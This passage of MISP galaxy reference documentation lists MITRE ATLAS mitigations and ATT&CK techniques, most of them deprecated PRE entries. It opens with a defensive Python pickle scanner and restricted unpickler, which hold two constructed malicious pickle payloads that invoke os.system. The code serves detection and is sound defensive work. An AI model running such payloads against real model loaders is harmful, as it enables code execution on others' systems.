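The pickle caveat raised under both Restrict Library Loading (AML.M0011) and Vulnerability Scanning (AML.M0016) can be made concrete. The following Python is an added example, not code from ATLAS, MISP or the pickle project: `forbidden_globals` is a static scanner that walks the opcode stream with the standard library's `pickletools` and lists every module import the file would perform, without executing anything; `RestrictedUnpickler` is the runtime counterpart, refusing any import outside a small allowlist. The two "malicious" byte strings are constructed by hand to encode the call `os.system("echo pwned")` (one in protocol 0 with the GLOBAL opcode, one in protocol 4 with STACK_GLOBAL) and are never passed to `pickle.loads`; the allowlist contents are an assumption to be set per application.

```python
import io
import pickle
import pickletools

# Opcodes that push a string; STACK_GLOBAL (protocol 4+) consumes the last two of them.
_STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
               "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

# Hypothetical allowlist: plain containers only, nothing that can run code.
ALLOWED_GLOBALS = {
    "builtins": {"set", "frozenset", "bytearray", "complex", "range", "slice"},
    "collections": {"OrderedDict"},
}


def list_globals(data):
    """Static scan: every (module, name) the pickle would import, found by
    decoding opcodes only. Nothing in the file is executed."""
    found, recent_strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":            # protocols 0-3: one "module name" argument
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":    # protocol 4+: module and name pushed before it
            if len(recent_strings) >= 2:
                found.append((recent_strings[-2], recent_strings[-1]))
        elif opcode.name in _STRING_OPS:
            recent_strings.append(arg)
    return found


def forbidden_globals(data):
    return [(m, n) for m, n in list_globals(data) if n not in ALLOWED_GLOBALS.get(m, ())]


class RestrictedUnpickler(pickle.Unpickler):
    """Runtime guard: find_class is the one hook every import goes through."""

    def find_class(self, module, name):
        if name in ALLOWED_GLOBALS.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def restricted_load_outcome(data):
    """'rejected' if the restricted unpickler refuses the file, else 'loaded'."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return "rejected"
    return "loaded"


# Constructed samples, not real model files. Both malicious ones would call
# os.system("echo pwned") under pickle.loads; they are only scanned or
# loaded through RestrictedUnpickler here.
MALICIOUS_P0 = b"cos\nsystem\n(S'echo pwned'\ntR."
MALICIOUS_P4 = b"\x80\x04\x8c\x02os\x8c\x06system\x93\x8c\x0aecho pwned\x85R."
BENIGN = pickle.dumps({"weights": [0.1, 0.2], "bias": 0.5}, protocol=4)

if __name__ == "__main__":
    for label, blob in [("p0", MALICIOUS_P0), ("p4", MALICIOUS_P4), ("benign", BENIGN)]:
        print(label, forbidden_globals(blob), restricted_load_outcome(blob))
```

Use the scanner as a gate in the artifact pipeline (reject on any forbidden global) and the restricted unpickler in the loading code, so a file that slips past one control still meets the other. Neither replaces moving to a format that carries no code, such as safetensors, which is the durable fix.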

Model Distribution Methods

Deploying ML models to edge devices can increase the attack surface of the system. Consider serving models in the cloud to reduce the level of access the adversary has to the model.

The tag is: misp-galaxy:mitre-atlas-course-of-action="Model Distribution Methods"

Model Distribution Methods has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Model" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="White-Box Optimization" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Full ML Model Access" with estimative-language:likelihood-probability="almost-certain"

Table 5317. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0017

User Training

Educate ML model developers on secure coding practices and ML vulnerabilities.

The tag is: misp-galaxy:mitre-atlas-course-of-action="User Training"

User Training has relationships with:

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="User Execution" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts" with estimative-language:likelihood-probability="almost-certain"

Table 5318. Table References

Links

https://atlas.mitre.org/mitigations/AML.M0018

Attack Pattern

ATT&CK tactic.

Attack Pattern is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Test ability to evade automated mobile application security analysis performed by app stores - T1393

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1393).

Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)

The tag is: misp-galaxy:mitre-attack-pattern="Test ability to evade automated mobile application security analysis performed by app stores - T1393"

Table 5319. Table References

Links

https://attack.mitre.org/techniques/T1393

Choose pre-compromised mobile app developer account credentials or signing keys - T1391

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1391).

The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer’s identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)

The tag is: misp-galaxy:mitre-attack-pattern="Choose pre-compromised mobile app developer account credentials or signing keys - T1391"

Table 5320. Table References

Links

https://attack.mitre.org/techniques/T1391

Enumerate externally facing software applications technologies, languages, and dependencies - T1261

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1261).

Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)

The tag is: misp-galaxy:mitre-attack-pattern="Enumerate externally facing software applications technologies, languages, and dependencies - T1261"

Table 5321. Table References

Links

https://attack.mitre.org/techniques/T1261

Obtain Apple iOS enterprise distribution key pair and certificate - T1392

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1392).

The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Apple iOS enterprise distribution key pair and certificate - T1392"

Table 5322. Table References

Links

https://attack.mitre.org/techniques/T1392

Analyze social and business relationships, interests, and affiliations - T1295

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).

Social media provides insight into the target’s affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze social and business relationships, interests, and affiliations - T1295"

Table 5323. Table References

Links

https://attack.mitre.org/techniques/T1295

Linux and Mac File and Directory Permissions Modification - T1222.002

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. (Citation: Hybrid Analysis Icacls1 June 2018) (Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).

Adversaries may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). (Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002"

Table 5324. Table References

Links

https://attack.mitre.org/techniques/T1222/002

https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Install and configure hardware, network, and systems - T1336

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1336).

An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)

The tag is: misp-galaxy:mitre-attack-pattern="Install and configure hardware, network, and systems - T1336"

Table 5325. Table References

Links

https://attack.mitre.org/techniques/T1336

Compromise 3rd party or closed-source vulnerability/exploit information - T1354

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1354).

There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party or closed-source vulnerability/exploit information - T1354"

Table 5326. Table References

Links

https://attack.mitre.org/techniques/T1354

https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage

Discover new exploits and monitor exploit-provider forums - T1350

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1350).

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)

The tag is: misp-galaxy:mitre-attack-pattern="Discover new exploits and monitor exploit-provider forums - T1350"

Table 5327. Table References

Links

https://attack.mitre.org/techniques/T1350

https://www.threatminer.org/_reports/2015/Equation_group_questions_and_answers.pdf

Acquire and/or use 3rd party software services - T1330

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330"

Acquire and/or use 3rd party software services - T1330 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308" with estimative-language:likelihood-probability="almost-certain"

Table 5328. Table References

Links

https://attack.mitre.org/techniques/T1330

Acquire and/or use 3rd party infrastructure services - T1307

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally, botnets are available for rent or purchase. Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307"

Acquire and/or use 3rd party infrastructure services - T1307 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329" with estimative-language:likelihood-probability="almost-certain"

Table 5329. Table References

Links

https://attack.mitre.org/techniques/T1307

Acquire and/or use 3rd party software services - T1308

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1308).

A wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1308"

Acquire and/or use 3rd party software services - T1308 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party software services - T1330" with estimative-language:likelihood-probability="almost-certain"

Table 5330. Table References

Links

https://attack.mitre.org/techniques/T1308

Test signature detection for file upload/email filters - T1361

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1361).

An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection for file upload/email filters - T1361"

Table 5331. Table References

Links

https://attack.mitre.org/techniques/T1361

Acquire and/or use 3rd party infrastructure services - T1329

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1329).

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally, botnets are available for rent or purchase. Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1329"

Acquire and/or use 3rd party infrastructure services - T1329 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire and/or use 3rd party infrastructure services - T1307" with estimative-language:likelihood-probability="almost-certain"

Table 5332. Table References

Links

https://attack.mitre.org/techniques/T1329

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

Acquire or compromise 3rd party signing certificates - T1310

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1310).

Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310"

Acquire or compromise 3rd party signing certificates - T1310 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332" with estimative-language:likelihood-probability="almost-certain"

Table 5333. Table References

Links

https://attack.mitre.org/techniques/T1310

Compromise 3rd party infrastructure to support delivery - T1312

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).

Instead of buying, leasing, or renting infrastructure, an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312"

Compromise 3rd party infrastructure to support delivery - T1312 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334" with estimative-language:likelihood-probability="almost-certain"

Table 5334. Table References

Links

https://attack.mitre.org/techniques/T1312

Acquire or compromise 3rd party signing certificates - T1332

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).

Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is. (Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1332"

Acquire or compromise 3rd party signing certificates - T1332 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Acquire or compromise 3rd party signing certificates - T1310" with estimative-language:likelihood-probability="almost-certain"

Table 5335. Table References

Links

https://attack.mitre.org/techniques/T1332

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

Compromise 3rd party infrastructure to support delivery - T1334

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1334).

Instead of buying, leasing, or renting infrastructure, an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334"

Compromise 3rd party infrastructure to support delivery - T1334 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1312" with estimative-language:likelihood-probability="almost-certain"

Table 5336. Table References

Links

https://attack.mitre.org/techniques/T1334

Human performs requested action of physical nature - T1385

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)

The tag is: misp-galaxy:mitre-attack-pattern="Human performs requested action of physical nature - T1385"

Table 5337. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1385

Abuse of iOS Enterprise App Signing Key - T1445

An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple’s App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).

Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple’s App Store.

Platforms: iOS

The tag is: misp-galaxy:mitre-attack-pattern="Abuse of iOS Enterprise App Signing Key - T1445"

Abuse of iOS Enterprise App Signing Key - T1445 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5338. Table References

Links

https://attack.mitre.org/techniques/T1445

Deliver Malicious App via Authorized App Store - T1475

Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.

App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:

Adversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)

Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)

Adversaries may also use control of a target’s Google account to use the Google Play Store’s remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)

The tag is: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475"

Table 5339. Table References

Links

http://dl.acm.org/citation.cfm?id=2592796

http://www.vvdveen.com/publications/BAndroid.pdf

https://attack.mitre.org/techniques/T1475

https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/

https://jon.oberheide.org/files/summercon12-bouncer.pdf

https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html

https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei

Device Unlock Code Guessing or Brute Force - T1459

An adversary could make educated guesses of the device lock screen’s PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Device Unlock Code Guessing or Brute Force - T1459"

Device Unlock Code Guessing or Brute Force - T1459 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461" with estimative-language:likelihood-probability="almost-certain"

Table 5340. Table References

Links

https://attack.mitre.org/techniques/T1459

Assign KITs, KIQs, and/or intelligence requirements - T1238

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).

Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Assign KITs, KIQs, and/or intelligence requirements - T1238"

Table 5341. Table References

Links

https://attack.mitre.org/techniques/T1238

Assess current holdings, needs, and wants - T1236

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1236).

Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)

The tag is: misp-galaxy:mitre-attack-pattern="Assess current holdings, needs, and wants - T1236"

Table 5342. Table References

Links

https://attack.mitre.org/techniques/T1236

Submit KITs, KIQs, and intelligence requirements - T1237

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).

Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Submit KITs, KIQs, and intelligence requirements - T1237"

Table 5343. Table References

Links

https://attack.mitre.org/techniques/T1237

Common, high volume protocols and software - T1321

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1321).

Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary’s traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)

The tag is: misp-galaxy:mitre-attack-pattern="Common, high volume protocols and software - T1321"

Table 5344. Table References

Links

https://attack.mitre.org/techniques/T1321

Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001

Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.

Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) instead of using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that are not typically encrypted (such as HTTP or FTP).

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001"

Table 5345. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048/001

Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002

Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channel requires a private key (only in the possession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.

Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002"

Table 5346. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1048/002

Non-traditional or less attributable payment options - T1316

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1316).

Using alternative payment options allows an adversary to hide their activities. Options include cryptocurrencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)

The tag is: misp-galaxy:mitre-attack-pattern="Non-traditional or less attributable payment options - T1316"

Table 5347. Table References

Links

https://attack.mitre.org/techniques/T1316

Choose pre-compromised persona and affiliated accounts - T1343

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1343).

For attacks incorporating social engineering, the utilization of an on-line persona is important. Utilizing an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)

The tag is: misp-galaxy:mitre-attack-pattern="Choose pre-compromised persona and affiliated accounts - T1343"

Table 5348. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1343

Malicious or Vulnerable Built-in Device Functionality - T1473

The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious or Vulnerable Built-in Device Functionality - T1473"

Malicious or Vulnerable Built-in Device Functionality - T1473 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 5349. Table References

Links

https://attack.mitre.org/techniques/T1473

Identify vulnerabilities in third-party software libraries - T1389

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1389).

Many applications use third-party software libraries, often without the application developer fully understanding how those libraries behave. For example, mobile applications often incorporate advertising libraries to generate revenue for the developer. A vulnerability in a third-party library can potentially be exploited in every application that uses it, and even after the library is fixed, many applications continue to ship older, vulnerable versions. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify vulnerabilities in third-party software libraries - T1389"

Table 5350. Table References

Links

https://attack.mitre.org/techniques/T1389

Registry Run Keys / Startup Folder - T1547.001

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

